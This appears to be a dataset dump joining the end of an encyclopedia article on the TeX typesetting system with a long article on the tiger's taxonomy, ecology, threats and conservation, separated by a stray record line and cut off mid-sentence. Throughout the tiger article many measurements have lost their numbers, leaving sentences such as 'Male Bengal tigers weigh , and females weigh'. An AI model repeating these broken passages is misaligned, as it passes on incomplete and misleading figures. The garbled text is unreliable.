
Development
The original source code for the current TeX software is written in WEB, a mixture of documentation written in TeX and a Pascal subset, in order to ensure readability and portability. For example, TeX does all of its dynamic allocation itself from fixed-size arrays and uses only fixed-point arithmetic for its internal calculations. As a result, TeX has been ported to almost all operating systems, usually by using the web2c program to convert the source code into C instead of directly compiling the Pascal code. Knuth has kept a very detailed log of all the bugs he has corrected and changes he has made in the program since 1982; the list contains 440 entries, not including the version modification that should be done after his death as the final change in TeX. Knuth offers monetary awards to people who find and report a bug in TeX. The award per bug started at US$2.56 (one "hexadecimal dollar") and doubled every year until it was frozen at its current value of $327.68 (after seven annual doublings). Knuth has lost relatively little money as there have been very few bugs claimed. In addition, recipients have been known to frame their check as proof that they found a bug in TeX rather than cashing it. Due to scammers finding scanned copies of his checks on the internet and using them to try to drain his bank account, Knuth no longer sends out real checks, but those who submit bug reports can get credit at The Bank of San Serriffe instead.

Distributions and extensions
TeX is usually provided in the form of an easy-to-install bundle of TeX itself along with Metafont and all the necessary fonts, document formats, and utilities needed to use the typesetting system. On UNIX-compatible systems, including Linux and Apple macOS, TeX is distributed as part of the larger TeX Live distribution. (Prior to TeX Live, the teTeX distribution was the de facto standard on UNIX-compatible systems.) On Microsoft Windows, there is the MiKTeX distribution (enhanced by proTeXt) and the Microsoft Windows version of TeX Live. Several document processing systems are based on TeX, notably jadeTeX, which uses TeX as a backend for printing from James Clark's DSSSL Engine, the Arbortext publishing system, and Texinfo, the GNU documentation processing system. TeX has been the official typesetting package for the GNU operating system since 1984. Numerous extensions and companion programs for TeX exist, among them BibTeX for bibliographies (distributed with LaTeX); pdfTeX, a TeX-compatible engine which can directly produce PDF output (as well as continuing to support the original DVI output); XeTeX, a TeX-compatible engine that supports Unicode and OpenType; and LuaTeX, a Unicode-aware extension to TeX that includes a Lua runtime with extensive hooks into the underlying TeX routines and algorithms. Most TeX extensions are available for free from CTAN, the Comprehensive TeX Archive Network.

Editors
There are a variety of editors designed to work with TeX:
The TeXmacs text editor is a WYSIWYG-WYSIWYM scientific text editor, inspired by both TeX and Emacs. It uses Knuth's fonts and can generate TeX output.
Overleaf is a partial-WYSIWYG, online editor that provides a cloud-based solution to TeX along with additional features such as real-time collaborative editing.
LyX is a WYSIWYM document processor which runs on a variety of platforms, including Linux, Microsoft Windows (newer versions require Windows 2000 or later) and Apple macOS (using a non-native Qt front-end).
TeXShop (for macOS), TeXworks (for Linux, macOS and Windows) and WinShell (for Windows) are similar tools and provide an integrated development environment (IDE) for working with LaTeX or TeX.
For KDE/Qt, Kile provides such an IDE.
Texmaker is the pure Qt equivalent of Kile, with a user interface that is nearly the same as Kile's.
TeXstudio is an open-source fork (2009) of Texmaker that offers a different approach to configurability and features. Free downloadable binaries are provided for Windows, Linux, macOS, OS/2, and FreeBSD.
GNU Emacs has various built-in and third-party packages with support for TeX, the major one being AUCTeX.
Visual Studio Code has extensions that support TeX; a notable one is LaTeX Workshop.
For Vim, possible plugins include Vim-LaTeX Suite, Automatic TeX, and TeX-9.
For Apache OpenOffice and LibreOffice, the iMath and TexMaths extensions can provide mathematical TeX typesetting.
For MediaWiki, the Math extension provides mathematical TeX typesetting, but the code needs to be surrounded by a <math> tag.

Licence
Donald Knuth has indicated several times that the source code of TeX has been placed into the "public domain", and he strongly encourages modifications or experimentations with this source code. However, since Knuth highly values the reproducibility of the output of all versions of TeX, any changed version must not be called TeX, or anything confusingly similar. To enforce this rule, any implementation of the system must pass a test suite called the TRIP test before being allowed to be called TeX. The question of licence is somewhat confused by the statements included at the beginning of the TeX source code, which indicate that "all rights are reserved. Copying of this file is authorized only if ... you make absolutely no changes to your copy". This restriction should be interpreted as a prohibition on changing the source code as long as the file is called tex.web. The copyright note at the beginning of tex.web (and mf.web) was changed in 2021 to state this explicitly. This interpretation is confirmed later in the source code, where the TRIP test is mentioned ("If this program is changed, the resulting system should not be called 'TeX'"). The American Mathematical Society tried in the early 1980s to claim a trademark for TeX. This was rejected because at the time "TEX" (all caps) was registered by Honeywell for the "Text EXecutive" text processing system.

XML publication
It is possible to use TeX for automatic generation of sophisticated layout for XML data. The differences in syntax between the two description languages can be overcome with the help of TeXML. In the context of XML publication, TeX can thus be considered an alternative to XSL-FO. TeX allowed scientific papers in mathematical disciplines to be reduced to relatively small files that could be rendered client-side, allowing fully typeset scientific papers to be exchanged over the early Internet and emerging World Wide Web, even when sending large files was difficult. This paved the way for the creation of repositories of scientific papers such as arXiv, through which papers could be 'published' without an intermediary publisher.

Pronunciation and spelling
The name TeX is intended by its developer to be pronounced with the final consonant of loch.
The letters of the name are meant to represent the capital Greek letters tau, epsilon, and chi, as TeX is an abbreviation of τέχνη (tékhnē), Greek for both "art" and "craft", which is also the root word of technical. English speakers often pronounce it like the first syllable of technical. Knuth instructs that it be typeset with the "E" below the baseline and with reduced spacing between the letters. This is done, as Knuth mentions in his TeXbook, to distinguish TeX from other system names such as TEX, the Text EXecutive processor (developed by Honeywell Information Systems). Fans like to proliferate names from the word "TeX", such as TeXnician (user of TeX software), TeXhacker (TeX programmer), TeXmaster (competent TeX programmer), TeXhax, and TeXnique.

Community
Notable entities in the TeX community include the TeX Users Group (TUG), which currently publishes TUGboat and formerly published The PracTeX Journal, covering a wide range of topics in digital typography relevant to TeX. The Deutschsprachige Anwendervereinigung TeX (DANTE) is a large user group in Germany. The TeX Users Group was founded in 1980 for educational and scientific purposes; it provides an organization for those who have an interest in typography and font design and are users of the TeX typesetting system invented by Knuth, and it represents the interests of TeX users worldwide. The TeX Users Group publishes the journal TUGboat three times per year; DANTE publishes four times per year. Other user groups include DK-TUG in Denmark, GUTenberg in France, GuIT in Italy, NTG in the Netherlands and UK-TUG in the United Kingdom; the user groups jointly maintain a complete list.

Extensions
List of TeX extensions
Technology
Office and data management
null
30075
https://en.wikipedia.org/wiki/Tiger
Tiger
The tiger (Panthera tigris) is a large cat and a member of the genus Panthera native to Asia. It has a powerful, muscular body with a large head and paws, a long tail and orange fur with black, mostly vertical stripes. It is traditionally classified into nine recent subspecies, though some recognise only two subspecies, mainland Asian tigers and the island tigers of the Sunda Islands.

Throughout the tiger's range, it inhabits mainly forests, from coniferous and temperate broadleaf and mixed forests in the Russian Far East and Northeast China to tropical and subtropical moist broadleaf forests on the Indian subcontinent and Southeast Asia. The tiger is an apex predator and preys mainly on ungulates, which it takes by ambush. It lives a mostly solitary life and occupies home ranges, defending these from individuals of the same sex. The range of a male tiger overlaps with that of multiple females with whom he mates. Females give birth to usually two or three cubs that stay with their mother for about two years. When becoming independent, they leave their mother's home range and establish their own.

Since the early 20th century, tiger populations have lost at least 93% of their historic range and are locally extinct in West and Central Asia, in large areas of China and on the islands of Java and Bali. Today, the tiger's range is severely fragmented. It is listed as Endangered on the IUCN Red List of Threatened Species, as its range is thought to have declined by 53% to 68% since the late 1990s. Major threats to tigers are habitat destruction and fragmentation due to deforestation, poaching for fur and the illegal trade of body parts for medicinal purposes. Tigers are also victims of human–wildlife conflict as they attack and prey on livestock in areas where natural prey is scarce. The tiger is legally protected in all range countries. National conservation measures consist of action plans, anti-poaching patrols and schemes for monitoring tiger populations. In several range countries, wildlife corridors have been established and tiger reintroduction is planned.

The tiger is among the most popular of the world's charismatic megafauna. It has been kept in captivity since ancient times and has been trained to perform in circuses and other entertainment shows. The tiger featured prominently in the ancient mythology and folklore of cultures throughout its historic range and has continued to appear in culture worldwide.

Etymology
The Old English tigras derives from Old French tigre, from Latin tigris, which was a borrowing from Ancient Greek τίγρις (tígris). Since ancient times, the word has been suggested to originate from the Armenian or Persian word for 'arrow', which may also be the origin of the name for the river Tigris. However, today, the names are thought to be homonyms, and the connection between the tiger and the river is doubted.

Taxonomy
In 1758, Carl Linnaeus described the tiger in his work Systema Naturae and gave it the scientific name Felis tigris, as the genus Felis was being used for all cats at the time. His scientific description was based on descriptions by earlier naturalists such as Conrad Gessner and Ulisse Aldrovandi. In 1929, Reginald Innes Pocock placed the species in the genus Panthera using the scientific name Panthera tigris.

Subspecies
Nine recent tiger subspecies have been proposed between the early 19th and early 21st centuries, namely the Bengal, Malayan, Indochinese, South China, Siberian, Caspian, Javan, Bali and Sumatran tigers.
The validity of several tiger subspecies was questioned in 1999, as most putative subspecies had been distinguished on the basis of fur length and colouration, striping patterns and body size of specimens in natural history museum collections that are not necessarily representative of the entire population. It was proposed to recognise only two tiger subspecies as valid, namely P. t. tigris in mainland Asia and the smaller P. t. sondaica in the Greater Sunda Islands. This two-subspecies proposal was reaffirmed in 2015 through a comprehensive analysis of morphological, ecological and mitochondrial DNA (mtDNA) traits of all putative tiger subspecies. In 2017, the Cat Classification Task Force of the IUCN Cat Specialist Group revised felid taxonomy in accordance with the 2015 two-subspecies proposal and recognised only P. t. tigris and P. t. sondaica. Results of a 2018 whole-genome sequencing study of 32 samples from the six living putative subspecies—the Bengal, Malayan, Indochinese, South China, Siberian and Sumatran tiger—found them to be distinct and separate clades. These results were corroborated in 2021 and 2023. The Cat Specialist Group states that "Given the varied interpretations of data, the [subspecific] taxonomy of this species is currently under review by the IUCN SSC Cat Specialist Group." The following tables are based on the classification of the tiger as of 2005, and also reflect the classification recognised by the Cat Classification Task Force in 2017.

Evolution
The tiger shares the genus Panthera with the lion, leopard, jaguar and snow leopard. Results of genetic analyses indicate that the tiger and snow leopard are sister species whose lineages split from each other between 2.70 and 3.70 million years ago. The tiger's whole genome sequencing shows repeated sequences that parallel those in other cat genomes. The fossil species Panthera palaeosinensis of early Pleistocene northern China was described as a possible tiger ancestor when it was discovered in 1924, but modern cladistics places it as basal to modern Panthera. Panthera zdanskyi lived around the same time and place, and was suggested to be a sister species of the modern tiger when it was examined in 2014. However, as of 2023, at least two subsequent studies considered P. zdanskyi likely to be a synonym of P. palaeosinensis, noting that its proposed differences from that species fell within the range of individual variation. The earliest appearance of the modern tiger species in the fossil record consists of jaw fragments from Lantian in China that are dated to the early Pleistocene. Middle- to late-Pleistocene tiger fossils have been found throughout China, Sumatra and Java. Prehistoric subspecies include Panthera tigris trinilensis and P. t. soloensis of Java and Sumatra and P. t. acutidens of China; late Pleistocene and early Holocene fossils of tigers have also been found in Borneo and Palawan, Philippines. Fossil specimens of tigers have also been reported from the Middle-Late Pleistocene of Japan. Results of a phylogeographic study indicate that all living tigers have a common ancestor that lived between 108,000 and 72,000 years ago. Genetic studies suggest that the tiger population contracted around 115,000 years ago due to glaciation. Modern tiger populations originated from a refugium in Indochina and spread across Asia after the Last Glacial Maximum. As they colonised northeastern China, the ancestors of the South China tiger intermixed with a relict tiger population.
Hybrids
Tigers can interbreed with other Panthera cats and have done so in captivity. The liger is the offspring of a female tiger and a male lion, and the tigon is the offspring of a male tiger and a female lion. The lion sire passes on a growth-promoting gene, but the corresponding growth-inhibiting gene from the female tiger is absent, so that ligers grow far larger than either parent species. By contrast, the male tiger does not pass on a growth-promoting gene while the lioness passes on a growth-inhibiting gene; hence, tigons are around the same size as their parents. Since they often develop life-threatening birth defects and can easily become obese, breeding these hybrids is regarded as unethical.

Characteristics
The tiger has a typical felid morphology, with a muscular body, shortened legs, strong forelimbs with wide front paws, a large head and a tail that is about half the length of the rest of its body. It has five digits, including a dewclaw, on the front feet and four on the back, all of which have retractile claws that are compact and curved, and can reach long. The ears are rounded and the eyes have a round pupil. The snout ends in a triangular, pink tip with small black dots, the number of which increases with age. The tiger's skull is robust, with a constricted front region, proportionally small, elliptical orbits, long nasal bones and a lengthened cranium with a large sagittal crest. It resembles a lion's skull, but differs from it in the concave or flattened underside of the lower jaw and in its longer nasals. The tiger has 30 fairly robust teeth and its somewhat curved canines are the longest in the cat family at . The tiger has a head-body length of with a tail and stands at the shoulder. The Siberian and Bengal tigers are the largest. Male Bengal tigers weigh , and females weigh ; island tigers are the smallest, likely due to insular dwarfism. Male Sumatran tigers weigh , and females weigh . The tiger is popularly thought to be the largest living felid species; but since tigers of the different subspecies and populations vary greatly in size and weight, the tiger's average size may be less than the lion's, while the largest tigers are bigger than their lion counterparts.

Coat
The tiger's coat usually has short hairs, reaching up to , though the hairs of the northern-living Siberian tiger can reach . Belly hairs tend to be longer than back hairs. The density of their fur is usually thin, though the Siberian tiger develops a particularly thick winter coat. The tiger has lines of fur around the face and long whiskers, especially in males. It has an orange colouration that varies from yellowish to reddish. White fur covers the underside, from head to tail, along with the inner surface of the legs and parts of the face. On the back of the ears, it has a prominent white spot, which is surrounded by black. The tiger is marked with distinctive black or dark brown stripes, which are uniquely patterned in each individual. The stripes are mostly vertical, but those on the limbs and forehead are horizontal. They are more concentrated towards the backside and those on the trunk may reach under the belly. The tips of stripes are generally sharp and some may split up or split and fuse again. Tail stripes are thick bands and a black tip marks the end. The tiger is one of only a few striped cat species. Stripes are advantageous for camouflage in vegetation with vertical patterns of light and shade, such as trees, reeds and tall grass.
This is supported by a Fourier analysis study showing that the striping patterns line up with their environment. The orange colour may also aid in concealment, as the tiger's prey is colour blind and possibly perceives the tiger as green and blended in with the vegetation.

Colour variations
The three colour variants of Bengal tigers – nearly stripeless snow-white, white and golden – are now virtually non-existent in the wild due to the reduction of wild tiger populations but continue in captive populations. The white tiger has a white background colour with sepia-brown stripes. The golden tiger is pale golden with reddish-brown stripes. The snow-white tiger is a morph with extremely faint stripes and a pale sepia-brown ringed tail. White and golden morphs are the result of an autosomal recessive trait with a white locus and a wideband locus, respectively. The snow-white variation is caused by polygenes with both white and wideband loci. The breeding of white tigers is controversial, as they have no use for conservation. Only 0.001% of wild tigers have the genes for this colour morph and the overrepresentation of white tigers in captivity is the result of inbreeding. Hence, their continued breeding will risk both inbreeding depression and loss of genetic variability in captive tigers. Pseudo-melanistic tigers with thick, merged stripes have been recorded in Simlipal National Park and three Indian zoos; a population genetic analysis of Indian tiger samples revealed that this phenotype is caused by a mutation of a transmembrane aminopeptidase gene. Around 37% of the Simlipal tiger population has this feature, which has been linked to genetic isolation.

Distribution and habitat
The tiger historically ranged from eastern Turkey, northern Iran and Afghanistan to Central Asia and from northern Pakistan through the Indian subcontinent and Indochina to southeastern Siberia, Sumatra, Java and Bali. As of 2022, it inhabits less than 7% of its historical distribution and has a scattered range in the Indian subcontinent, the Indochinese Peninsula, Sumatra, northeastern China and the Russian Far East. As of 2020, India had the largest extent of global tiger habitat with , followed by Russia with . The tiger mainly lives in forest habitats and is highly adaptable. Records in Central Asia indicate that it primarily inhabited Tugay riverine forests and hilly and lowland forests in the Caucasus. In the Amur-Ussuri region of Russia and China, it inhabits Korean pine and temperate broadleaf and mixed forests; riparian forests serve as dispersal corridors, providing food and water for both tigers and ungulates. On the Indian subcontinent, it inhabits mainly tropical and subtropical moist broadleaf forests, temperate broadleaf and mixed forests, tropical moist evergreen forests, tropical dry forests, alluvial plains and the mangrove forests of the Sundarbans. In the Eastern Himalayas, it was documented in temperate forest up to an elevation of in Bhutan, of in the Mishmi Hills and of in Mêdog County, southeastern Tibet. In Thailand, it lives in deciduous and evergreen forests. In Sumatra, it inhabits lowland peat swamp forests and rugged montane forests.

Population density
Camera trapping during 2010–2015 in the deciduous and subtropical pine forest of Jim Corbett National Park, northern India revealed a stable tiger population density of 12–17 individuals per in an area of .
In northern Myanmar, the population density in a sampled area of roughly in a mosaic of tropical broadleaf forest and grassland was estimated to be 0.21–0.44 tigers per as of 2009. Population density in mixed deciduous and semi-evergreen forests of Thailand's Huai Kha Khaeng Wildlife Sanctuary was estimated at 2.01 tigers per ; during the 1970s and 1980s, logging and poaching had occurred in the adjacent Mae Wong and Khlong Lan National Parks, where population density was much lower, estimated at only 0.359 tigers per as of 2016. Population density in dipterocarp and montane forests in northern Malaysia was estimated at 1.47–2.43 adult tigers per in Royal Belum State Park, but 0.3–0.92 adult tigers per in the unprotected selectively logged Temengor Forest Reserve.

Behaviour and ecology
Camera trap data show that tigers in Chitwan National Park avoided locations frequented by people and were more active at night than during the day. In Sundarbans National Park, six radio-collared tigers were most active from dawn to early morning and reached their peak of activity around 7:00 in the morning. A three-year-long camera trap survey in Shuklaphanta National Park revealed that tigers were most active from dusk until midnight. In northeastern China, tigers were crepuscular and active at night with activity peaking at dawn and dusk; they were largely active at the same time as their prey. The tiger is a powerful swimmer and easily traverses rivers as wide as ; it immerses itself in water, particularly on hot days. In general, it is less capable of climbing trees than many other cats due to its size, but cubs under 16 months old may routinely do so. An adult was recorded climbing up a smooth pipal tree.

Social spacing
Adult tigers lead largely solitary lives within home ranges or territories, the size of which mainly depends on prey abundance, geographic area and sex of the individual. Males and females defend their home ranges from those of the same sex and the home range of a male encompasses that of multiple females. Two females in the Sundarbans had home ranges of . In Panna Tiger Reserve, the home ranges of five reintroduced females varied from in winter to in summer and to during the monsoon; three males had large home ranges in winter, in summer and during monsoon seasons. In Sikhote-Alin Biosphere Reserve, 14 females had home ranges and five resident males of that overlapped with those of up to five females. When tigresses in the same reserve had cubs of up to four months of age, they reduced their home ranges to stay near their young and steadily enlarged them until their offspring were 13–18 months old. The tiger is a long-ranging species and individuals disperse over distances of up to to reach tiger populations in other areas. Young tigresses establish their first home ranges close to their mothers', while males migrate further than their female counterparts. Four radio-collared females in Chitwan dispersed between and 10 males between . A subadult male lives as a transient in another male's home range until he is older and strong enough to challenge the resident male. Tigers mark their home ranges by spraying urine on vegetation and rocks, clawing or scent rubbing trees and marking trails with faeces, anal gland secretions and ground scrapings. Scent markings also allow an individual to pick up information on another's identity. Unclaimed home ranges, particularly those that belonged to a deceased individual, can be taken over in days or weeks.
Male tigers are generally less tolerant of other males within their home ranges than females are of other females. Disputes are usually solved by intimidation rather than fighting. Once dominance has been established, a male may tolerate a subordinate within his range, as long as they do not come near him. The most serious disputes tend to occur between two males competing for a female in oestrus. Though tigers mostly live alone, relationships between individuals can be complex. Tigers are particularly social at kills, and a male tiger will sometimes share a carcass with the females and cubs within his home range and, unlike male lions, will allow them to feed on the kill before he is finished with it. However, a female is more tense when encountering another female at a kill.

Communication
During friendly encounters and bonding, tigers rub against each other's bodies. Facial expressions include the "defence threat", which involves a wrinkled face, bared teeth, pulled-back ears and widened pupils. Both males and females show a flehmen response, a characteristic curled-lip grimace, when smelling urine markings. Males also use the flehmen to detect the markings made by tigresses in oestrus. Tigers will move their ears around to display the white spots, particularly during aggressive encounters and between mothers and cubs. They also use their tails to signal their mood. To show cordiality, the tail sticks up and sways slowly, while an apprehensive tiger lowers its tail or wags it side-to-side. When calm, the tail hangs low. Tigers are normally silent but can produce numerous vocalisations. They roar to signal their presence to other individuals over long distances. This vocalisation is forced through an open mouth as it closes and can be heard away. They roar multiple times in a row and others respond in kind. Tigers also roar during mating and a mother will roar to call her cubs to her. When tense, tigers moan, a sound similar to a roar but softer and made when the mouth is at least partially closed. Moaning can be heard away. Aggressive encounters involve growling, snarling and hissing. An explosive "coughing roar" or "coughing snarl" is emitted through an open mouth and exposed teeth. In friendlier situations, tigers prusten, a soft, low-frequency snorting sound similar to purring in smaller cats. Tiger mothers communicate with their cubs by grunting, while cubs call back with miaows. When startled, they "woof". They produce a deer-like "pok" sound for unknown reasons, but most often at kills.

Hunting and diet
The tiger is a carnivore and an apex predator feeding mainly on large and medium-sized ungulates, with a preference for sambar deer, Manchurian wapiti, barasingha, gaur and wild boar. Abundance and body weight of prey species are assumed to be the main criteria for the tiger's prey selection, both inside and outside protected areas. It also preys opportunistically on smaller species like monkeys, peafowl and other ground-based birds, porcupines and fish. Occasional attacks on Asian elephants and Indian rhinoceroses have also been reported; more often, tigers take the more vulnerable calves. They sometimes prey on livestock and dogs in close proximity to settlements. Tigers occasionally consume vegetation, fruit and minerals for dietary fibre and supplements. Tigers learn to hunt from their mothers, though the ability to hunt may be partially inborn. Depending on the size of the prey, they typically kill weekly, though mothers must kill more often.
Families hunt together when cubs are old enough. Tigers search for prey using vision and hearing. A tiger will also wait at a watering hole for prey to come by, particularly on hot summer days. It is an ambush predator: when approaching potential prey, it crouches with its head lowered and hides in foliage, switching between creeping forward and staying still. A tiger may even doze off and can stay in the same spot for as long as a day while waiting for prey, launching an attack when the prey is close enough, usually within . If the prey spots it before then, the cat does not pursue further. A tiger can sprint and leap ; it is not a long-distance runner and gives up a chase if the prey outpaces it over a certain distance. The tiger attacks from behind or from the sides and tries to knock the target off balance. It latches onto prey with its forelimbs, twisting and turning during the struggle, and tries to pull it to the ground. The tiger generally applies a bite to the throat until its victim dies of strangulation; it has an average bite force at the canine tips of 1,234.3 newtons. Holding onto the throat puts the cat out of reach of horns, antlers, tusks and hooves. Tigers are adaptable killers and may use other methods, including ripping the throat or breaking the neck. Large prey may be disabled by a bite to the back of the hock, severing the tendon. Swipes from the tiger's large paws are capable of stunning a water buffalo or breaking its skull. Small prey is killed with a bite to the back of the neck or head. Estimates of tigers' hunting success rate range from a low of 5% to a high of 50%. Tigers are sometimes killed or injured by large or dangerous prey like gaur, buffalo and boar. They typically move kills to a private, usually vegetated spot no further than , though they have been recorded dragging them . They are strong enough to drag the carcass of a fully grown buffalo for some distance. They rest for a while before eating and can consume as much as of meat in one session, but will feed on a carcass for several days, leaving little for scavengers. Competitors In much of their range, tigers share habitat with leopards and dholes. They typically dominate both, though with dholes the outcome depends on pack size, and large dhole packs may kill tigers. Interactions between the three predators involve chasing, stealing kills and direct killing. Tigers, leopards and dholes coexist by hunting prey of different sizes. In Nagarhole National Park, the average weight of tiger kills was found to be , compared with for leopards and for dholes. In Kui Buri National Park, following a reduction in prey numbers, tigers continued to kill favoured prey while leopards and dholes increased their consumption of small prey. Both leopards and dholes can live successfully in tiger habitat when there is abundant food and vegetation cover; otherwise, they appear to be less common where tigers are numerous. The recovery of the tiger population in Rajaji National Park during the 2000s led to a reduction in leopard population densities. Similarly, at two sites in central India, the size of dhole packs was negatively correlated with tiger densities. Leopard and dhole distribution in Kui Buri correlated with both prey access and tiger scarcity. In Jigme Dorji National Park, tigers were found to inhabit the deeper parts of forests while the smaller predators were pushed closer to the fringes. Reproduction and life cycle The tiger generally mates all year round, particularly between November and April. 
A tigress is in oestrus for three to six days at a time, separated by three- to nine-week intervals. A resident male mates with all the females within his home range, who signal their receptiveness by roaring and marking. Younger, transient males are also attracted, leading to fights in which the more dominant, resident male drives the usurper off. During courtship, the male is cautious with the female as he waits for her to show signs that she is ready to mate. She signals to him by positioning herself in lordosis with her tail to the side. Copulation typically lasts no more than 20 seconds, with the male biting the female by the scruff of her neck. Afterwards, the male quickly pulls away, as the female may turn and slap him. Tiger pairs may stay together for up to four days and mate multiple times. Gestation lasts around three months or slightly longer. A tigress gives birth in a secluded location, be it in dense vegetation, in a cave or under a rocky shelter. Litters consist of as many as seven cubs, but two or three are more typical. Newborn cubs weigh and are blind and altricial. The mother licks and cleans her cubs, suckles them and fiercely defends them from any potential threat. Cubs open their eyes at the age of three to 14 days, and their vision becomes clear after a few more weeks. They can leave the denning site after two months, around the same time they start eating meat. The mother leaves them alone only to hunt, and even then she does not travel far. When she suspects an area is no longer safe, she moves her cubs to a new spot, transporting them one by one by grabbing them by the scruff of the neck with her mouth. A tigress in Sikhote-Alin Biosphere Reserve maximised the time spent with her cubs by reducing her home range, killing larger prey and returning to her den more rapidly than when she had no cubs; when the cubs started to eat meat, she took them to kill sites, thereby optimising their protection and access to food. In the same reserve, only one of 21 cubs died over eight years of monitoring, and mortality did not differ between male and female juveniles. Tiger monitoring over six years in Ranthambore Tiger Reserve indicated an average annual survival rate of around 85 percent for 74 male and female cubs; the survival rate increased to 97 percent for male and female juveniles of one to two years of age. Causes of cub mortality include predators, floods, fires, death of the mother and fatal injuries. After around two months, the cubs are able to follow their mother, though they still hide in vegetation when she goes hunting. Young bond through play fighting and practise stalking. A hierarchy develops in the litter, with the biggest cub, often a male, being the most dominant and the first to eat its fill at a kill. Around the age of six months, cubs are fully weaned and have more freedom to explore their environment. Between eight and ten months, they accompany their mother on hunts. A cub can make a kill as early as 11 months and reaches independence at 18 to 24 months of age; males become independent earlier than females. Radio-collared tigers in Chitwan started leaving their natal areas at the age of 19 months. Young females are sexually mature at three to four years, males at four to five years. The generation length of the tiger is about 7–10 years. Wild Bengal tigers live 12–15 years. Data from the International Tiger Studbook 1938–2018 indicate that captive tigers have lived up to 19 years. 
The father does not play a role in raising the young, but he does encounter and interact with them. The resident male appears to visit the female–cub families within his home range; they socialise and even share kills. One male was recorded looking after cubs whose mother had died. By defending his home range, the male protects the females and cubs from other males. When a new male takes over, dependent cubs are at risk of infanticide, as the male attempts to sire his own young with the females. A seven-year-long study in Chitwan National Park revealed that 12 of 56 detected cubs and juveniles were killed by new males taking over home ranges. Health and diseases Tigers are recorded as hosts for various parasites, including tapeworms like Diphyllobothrium erinacei and Taenia pisiformis in India, and nematodes like Toxocara species in India and Physaloptera preputialis, Dirofilaria ursi and Uiteinarta species in Siberia. Canine distemper is known to occur in Siberian tigers. A morbillivirus infection was the likely cause of death of a tigress in the Russian Far East that also tested positive for feline panleukopenia and feline coronavirus. Blood samples from 11 adult tigers in Nepal showed antibodies against canine parvovirus-2, feline herpesvirus, feline coronavirus, leptospirosis and Toxoplasma gondii. Threats The tiger has been listed as Endangered on the IUCN Red List since 1986, and the global tiger population is thought to have continuously declined from an estimated 5,000–8,262 tigers in the late 1990s to 3,726–5,578 individuals estimated as of 2022. During 2001–2020, landscapes where tigers live declined from to . Habitat destruction, habitat fragmentation and poaching for fur and body parts are the major threats that have contributed to the decrease of tiger populations in all range countries. Protected areas in central India are highly fragmented due to linear infrastructure like roads, railway lines, transmission lines and irrigation channels, and due to mining activities in their vicinity. In the Tanintharyi Region of southern Myanmar, deforestation coupled with mining activities and high hunting pressure threatens the tiger population. In Thailand, nine of 15 protected areas hosting tigers are isolated and fragmented, offering a low probability of dispersal between them; four of these have not harboured tigers since about 2013. In Peninsular Malaysia, of tiger habitat was cleared during 1988–2012, most of it for industrial plantations. Large-scale land acquisitions of about for commercial agriculture and timber extraction in Cambodia contributed to the fragmentation of potential tiger habitat, especially in the Eastern Plains. Inbreeding depression, coupled with habitat destruction, insufficient prey resources and poaching, is a threat to the small and isolated tiger population in the Changbai Mountains along the China–Russia border. In China, tigers became the target of large-scale 'anti-pest' campaigns in the early 1950s, and suitable habitats were fragmented following deforestation and the resettlement to rural areas of people who hunted tigers and their prey species. Though tiger hunting was prohibited in 1977, the population continued to decline, and the tiger has been considered extinct in South China since 2001. Tiger populations in India have been targeted by poachers since the 1990s and were extirpated in two tiger reserves in 2005 and 2009. 
Between March 2017 and January 2020, 630 signs of hunting activity, involving snares, drift nets, hunting platforms and hunting dogs, were discovered in a reserve forest of about in southern Myanmar. Nam Et-Phou Louey National Park was considered the last important site for the tiger in Laos, but the species has not been recorded there since at least 2013; this population likely fell victim to indiscriminate snaring. Anti-poaching units in Sumatra's Kerinci Seblat landscape removed 362 tiger snare traps and seized 91 tiger skins during 2005–2016; annual poaching rates increased with rising skin prices. Poaching is also the main threat to the tiger population in far eastern Russia, where logging roads facilitate access for poachers and for people harvesting forest products that are important for prey species to survive the winter. Body parts of 207 tigers were detected during 21 surveys in 1991–2014 in two wildlife markets in Myanmar catering to customers in Thailand and China. During the years 2000–2022, at least 3,377 tigers were confiscated in 2,205 seizures in 28 countries; the seizures encompassed 665 live and 654 dead individuals, 1,313 whole tiger skins, 16,214 body parts like bones, teeth, paws, claws and whiskers, and of meat; 759 seizures in India involved body parts of 893 tigers, and 403 seizures in Thailand involved mostly captive-bred tigers. Seizures in Nepal between January 2011 and December 2015 yielded 585 pieces of tiger body parts and two whole carcasses in 19 districts. Seizure data from India during 2001–2021 indicate that tiger skins were the most often traded body parts, followed by claws, bones and teeth; trafficking routes mainly passed through the states of Maharashtra, Karnataka, Tamil Nadu and Assam. A total of 292 illegal tiger parts were confiscated at US ports of entry from personal baggage, air cargo and mail between 2003 and 2012. Demand for tiger parts for use in traditional Chinese medicine has also been cited as a major threat to tiger populations. Interviews with local people in the Bangladeshi Sundarbans revealed that they kill tigers for local consumption and for trade in skins, bones and meat, in retaliation for attacks by tigers, and for excitement. Tiger body parts like skins, bones, teeth and hair are consumed locally by wealthy Bangladeshis and are illegally trafficked from Bangladesh to 15 countries, including India, China, Malaysia, Korea, Vietnam, Cambodia, Japan and the United Kingdom, via land borders, airports and seaports. Tiger bone glue is the prevailing tiger product purchased for medicinal purposes in Hanoi and Ho Chi Minh City. "Tiger farm" facilities in China and Southeast Asia breed tigers for their parts, but these operations appear to worsen the threat to wild populations by increasing the demand for tiger products. The killing of tigers by local people in retaliation for attacks on livestock is a threat in several tiger range countries; this consequence of human–wildlife conflict also contributes to the decline of the population. Conservation Internationally, the tiger is protected under CITES Appendix I, which bans trade in live tigers and their body parts. In Russia, hunting the tiger has been banned since 1952. In Bhutan, it has been protected since 1969 and listed as totally protected since 1995. Since 1972, it has been afforded the highest protection level under India's Wild Life (Protection) Act, 1972. In Nepal and Bangladesh, it has been protected since 1973. 
Since 1976, it has been totally protected under Malaysia's Protection of Wild Life Act, and the country's Wildlife Conservation Act, enacted in 2010, increased punishments for wildlife-related crimes. In Indonesia, it has been protected since 1990. In China, the trade in tiger body parts was banned in 1993. The Thai Wildlife Preservation and Protection Act was enacted in 2019 to combat poaching and the trading of body parts. In 1973, Project Tiger was founded in India to gain public support for tiger conservation; the programme is now administered by the National Tiger Conservation Authority. Since then, 53 tiger reserves covering an area of have been established in the country, as of 2022. Myanmar's national tiger conservation strategy, developed in 2003, comprises management tasks such as restoring degraded habitats, increasing the extent of protected areas and wildlife corridors, protecting tiger prey species, thwarting tiger killing and the illegal trade in its body parts, and promoting public awareness through wildlife education programmes. Bhutan's first Tiger Action Plan, implemented during 2006–2015, revolved around habitat conservation, human–wildlife conflict management, education and awareness; the second Action Plan aimed at increasing the country's tiger population by 20% by 2023, compared to 2015. In 2009, the Bangladesh Tiger Action Plan was initiated to stabilise the country's tiger population, maintain habitat and a sufficient prey base, improve law enforcement and foster cooperation between the governmental agencies responsible 